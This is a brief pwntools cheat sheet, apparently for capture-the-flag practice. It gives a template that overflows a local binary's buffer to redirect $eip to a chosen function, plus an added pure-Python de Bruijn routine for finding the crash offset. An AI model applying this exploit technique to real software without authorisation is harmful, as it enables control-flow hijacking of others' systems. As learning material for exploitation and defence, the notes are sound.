pwntools

Memory Addresses of ELF Binary

  • Find the address of a function and use it to overwrite $eip
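```python
from pwn import *

p = process("<binary>")  # path to the target binary
elf = ELF("<binary>")
# Look up the function's address in the ELF symbol table
__function = elf.symbols["<functionName>"]
payload = fit({
    42: __function  # Offset (length) measured via cyclic
})
p.sendline(payload)
p.interactive()
```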
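How the offset used in the `fit` call is measured, as an added example that is not part of the original notes: a pure-Python de Bruijn pattern (4-byte windows, lowercase alphabet) with an offset lookup, assuming a 32-bit little-endian target. The helper names `pattern`, `pattern_offset` and `layout` and the sample address are constructed for illustration.

```python
import struct
from itertools import islice

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"
N = 4  # window size: the number of bytes in one 32-bit register


def de_bruijn(alphabet=ALPHABET, n=N):
    """Yield a de Bruijn sequence: every n-byte window occurs exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def pattern(length):
    """First `length` bytes of the sequence (b'aaaabaaacaaad...')."""
    return bytes(islice(de_bruijn(), length))


def pattern_offset(reg_value, length=4096):
    """Offset of the 4 pattern bytes seen in a register after a crash, or -1."""
    needle = struct.pack("<I", reg_value)  # register value -> bytes as laid out in memory
    return pattern(length).find(needle)


def layout(offset, address):
    """Filler up to `offset`, then the address packed as 32-bit little-endian."""
    return pattern(offset) + struct.pack("<I", address)


if __name__ == "__main__":
    crashed_eip = 0x616C6161               # constructed: bytes b"aala" read little-endian
    off = pattern_offset(crashed_eip)
    print(off)                             # offset at which the register is controlled
    print(layout(off, 0x08049176).hex())   # constructed sample address
```

Because each 4-byte window is unique, the value found in the register after sending the pattern maps back to exactly one offset.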